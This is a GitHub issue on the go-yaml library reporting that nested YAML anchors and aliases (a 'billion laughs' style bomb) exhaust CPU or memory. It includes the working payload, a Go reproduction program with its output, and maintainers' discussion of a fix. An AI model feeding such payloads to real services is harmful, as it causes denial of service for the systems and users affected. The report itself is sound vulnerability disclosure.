Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security issue: Parsing malicious or large YAML documents can consume excessive amounts of CPU or memory. #461

Open
nclv opened this issue Jul 11, 2024 · 6 comments · May be fixed by #606
Labels
bug Something isn't working

Comments

@nclv
Copy link

nclv commented Jul 11, 2024

Improper input validation allows to parse malicious YAML payloads, causing the server to consume excessive CPU or memory, potentially crashing and becoming unavailable.

How to reproduce

a: &a [_,_,_,_,_,_,_,_,_,_,_,_,_,_,_]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e,*e]
package main

import (
	"encoding/binary"
	"fmt"
	"log"
	"math"
	"os"

	"github.com/goccy/go-yaml"
)

func prettyByteSize(b int) string {
	bf := float64(b)
	for _, unit := range []string{"", "Ki", "Mi", "Gi", "Ti", "Pi", "Ei", "Zi"} {
		if math.Abs(bf) < 1024.0 {
			return fmt.Sprintf("%3.1f%sB", bf, unit)
		}
		bf /= 1024.0
	}
	return fmt.Sprintf("%.1fYiB", bf)
}

func main() {
	data, err := os.ReadFile("./bomb.small.yaml")
	if err != nil {
		log.Fatalf("error: %v", err)
	}
	fmt.Printf("--- initial file:\n%s\n\n", prettyByteSize(binary.Size(data)))

	target := make(map[interface{}]interface{})

	err = yaml.Unmarshal(data, &target)
	if err != nil {
		log.Fatalf("error: %v", err)
	}
	// fmt.Printf("--- m:\n%v\n\n", target)

	data, err = yaml.Marshal(&target)
	if err != nil {
		log.Fatalf("error: %v", err)
	}
	fmt.Printf("--- target dump:\n%s\n\n", prettyByteSize(binary.Size(data)))
}
go run main.go 
--- initial file:
227.0B

--- target dump:
21.9MiB

The following .yaml file will be unmarshalled into several GB.

a: &a [_,_,_,_,_,_,_,_,_,_,_,_,_,_,_]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h,*h]

Expected behavior
Some checks should be implemented to prevent excessive memory usage.
See Add large document benchmarks, tune alias heuristic, add max depth limits #515 and go-yaml/yaml/blob/v3/decode.go.

Version Variables

  • Go version: 1.21.4
  • go-yaml's Version: v1.11.3

Additional context
CVE-2022-3064
GHSA-6q6q-88xp-6f2r

@goccy
Copy link
Owner

goccy commented Nov 27, 2024

This issue is likely resolved, and decoding no longer unnecessarily consumes memory or CPU. However, when encoding large values, resource consumption will increase proportionally to the size of those values.

@bep
Copy link

bep commented Nov 28, 2024

This issue is likely resolved, and decoding no longer unnecessarily consumes memory or CPU.

I tested the program above, and it makes the CPU fans hit the roof on my beefy MacBook Pro M1 with 32GB ram. I eventually had to kill the process.

@goccy
Copy link
Owner

goccy commented Nov 28, 2024

@bep I think that it is not being consumed during decoding but rather when writing out the value after decoding. This should occur not only during encoding but even with a simple fmt.Print statement. In other words, the instance being dumped is simply large.

@bep
Copy link

bep commented Nov 28, 2024

@goccy OK, I didn't read your comment correctly. You are right that the decoding part doesn't "blow up", but for this library to be useful for end user input, there need to be some kind of decoder protection against input like the above.

@goccy
Copy link
Owner

goccy commented Nov 29, 2024

@bep The decoder has already done the job correctly. The alias is all references, so the object in memory is not large. It just requires a lot of memory when writing it out. Also, this example does not consume the stack, but guards are already in place to prevent stack overflow.

@goccy goccy closed this as completed Nov 29, 2024
@goccy goccy linked a pull request Dec 23, 2024 that will close this issue
@goccy goccy reopened this Dec 23, 2024
@goccy
Copy link
Owner

goccy commented Dec 23, 2024

@bep
Hi ! I thought this issue could be resolved by utilizing reference information during encoding to produce YAML in a form close to the original. So, I implemented an option that automatically resolves anchors and aliases. Does this meet your expectations?

#606

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

Successfully merging a pull request may close this issue.

3 participants